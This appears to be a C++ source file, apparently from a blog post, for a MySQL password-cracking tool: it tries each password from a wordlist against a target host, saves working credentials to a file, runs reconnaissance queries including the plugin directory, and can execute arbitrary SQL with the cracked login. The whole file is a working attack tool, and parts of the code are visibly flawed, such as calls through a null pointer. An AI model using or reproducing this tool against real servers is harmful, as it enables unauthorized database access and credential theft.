#include "StdAfx.h"#include"Sql.h"#include#include#include
#pragma comment(linker,"/nodefaultlib:LIBCMT.lib")
#pragma comment(linker,"/nodefaultlib:MSVCRTD.lib")
#if defined _DEBUG
#pragma comment(lib, "mysqlclient_debug.lib")
#else
#pragma comment(lib, "mysqlclient.lib")
#endif
#pragma comment(lib, "wsock32.lib")
#pragma comment(lib, "Advapi32.lib") Sql::Sql(void)
{
}
Sql::~Sql(void)
{
}void Sql::writefiles(char*buffer)
{
FILE* fp =NULL;
fp= fopen("succ.txt","a+");if (fp !=NULL)
{
fwrite(buffer,strlen(buffer),1,fp);
}
fclose(fp);
}void Sql::Usage(char*help)
{
printf("[-]:%s Usage:->192.168.1.1->root->crack\r\n",help);
printf("[-]:%s Usage:->192.168.1.1->root->sql->passwordroot->select user()\r\n",help);//return;
exit(0);
}int Sql::crack_mysql(char* ServerHost,char* Username,char*password)
{
MYSQL*conn;
MYSQL_RES*res;
MYSQL_ROW row;char plugs[1024];
conn=mysql_init(NULL);char buffer[1024] = {0};int count = 0;char* Sql_exec[4] = {"select version()","select user()","show databases","select @@plugin_dir"};if (!mysql_real_connect(conn,ServerHost,
Username,password,"mysql",0,NULL,CLIENT_MULTI_STATEMENTS))
{
printf("Host:%s->Username:%s->Password:%s failed\r\n",ServerHost,Username,password);
mysql_close(conn);
}else{
memset(buffer,0,sizeof(buffer));
sprintf_s(buffer,"Host:%s->Username:%s->Password:%s successfuly\r\n\r\n",ServerHost,Username,password);
printf(buffer);
writefiles(buffer);if (mysql_select_db(conn,"mysql"))
{
printf("Select Errors the mysql database!\r\n");
}for (int i =0;i<4;i++)
{if(mysql_query(conn,Sql_exec[i]))
{
fprintf(stderr,"%s\r\n",mysql_error(conn));//exit(1);
}
res=mysql_use_result(conn);//res = mysql_store_result(conn);
while ((row = mysql_fetch_row(res)) !=NULL)
{
sprintf_s(plugs,"%s",row[0]);
printf("%s\r\n",plugs);
}
}
mysql_free_result(res);
mysql_close(conn);
}return 0;
}int Sql::sql_exec(char* ServerHost,char* Username,char* password,char*sql)
{
MYSQL*conn;
MYSQL_RES*res;
MYSQL_ROW row;char plugs[1024];
conn=mysql_init(NULL);int count = 0;if(mysql_real_connect(conn,ServerHost,
Username,password,"mysql",0,NULL,CLIENT_MULTI_STATEMENTS))
{
fprintf(stderr,"Host:%s->Username:%s->Password:%s successfuly\r\n\r\n",ServerHost,Username,password);if (mysql_select_db(conn,"mysql"))
{
printf("Select Errors the mysql database!\r\n");
}if(mysql_query(conn,sql))
{
fprintf(stderr,"%s\r\n",mysql_error(conn));//exit(1);
}if (!(res =mysql_store_result(conn)))
{return -2;
}while ((row = mysql_fetch_row(res)) !=NULL)
{
ZeroMemory(plugs,sizeof(plugs));
sprintf_s(plugs,"%s",row[0]);
printf("%s\r\n",plugs);
}
mysql_free_result(res);
mysql_close(conn);
}else{
fprintf(stderr,"Host:%s->Username:%s->Password:%s failed\r\n",ServerHost,Username,password);
}return 0;
}int main(int argc,char*argv[])
{char* ServerHost = argv[1];char* Username = argv[2];char* method = argv[3];
Sql* newsql =NULL;
FILE* fp =NULL;char buffer[MAX_PATH] = {0};if (argc < 3)
{
newsql->Usage(argv[0]);
}if (strstr(method,"crack"))
{
fp= fopen("pass.txt","rb");if (fp ==NULL)
{
printf("Error:%d, pwd.txt not found\r\n",GetLastError());return 0;
}while (fgets(buffer,MAX_PATH,fp) !=NULL)
{if (buffer[strlen(buffer) - 2] == '\r')
{
buffer[strlen(buffer)- 2] = '\0';
}if (buffer[strlen(buffer) - 2] == '\n')
{
buffer[strlen(buffer)- 2] = '\0';
}
newsql->crack_mysql(ServerHost,Username,buffer);
memset(buffer,0,sizeof(buffer));
}
fclose(fp);
}else if (strstr(method,"sql"))
{char* password = argv[4];char* sql = argv[5];
newsql->sql_exec(ServerHost,Username,password,sql);
}return 0;
}
63
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
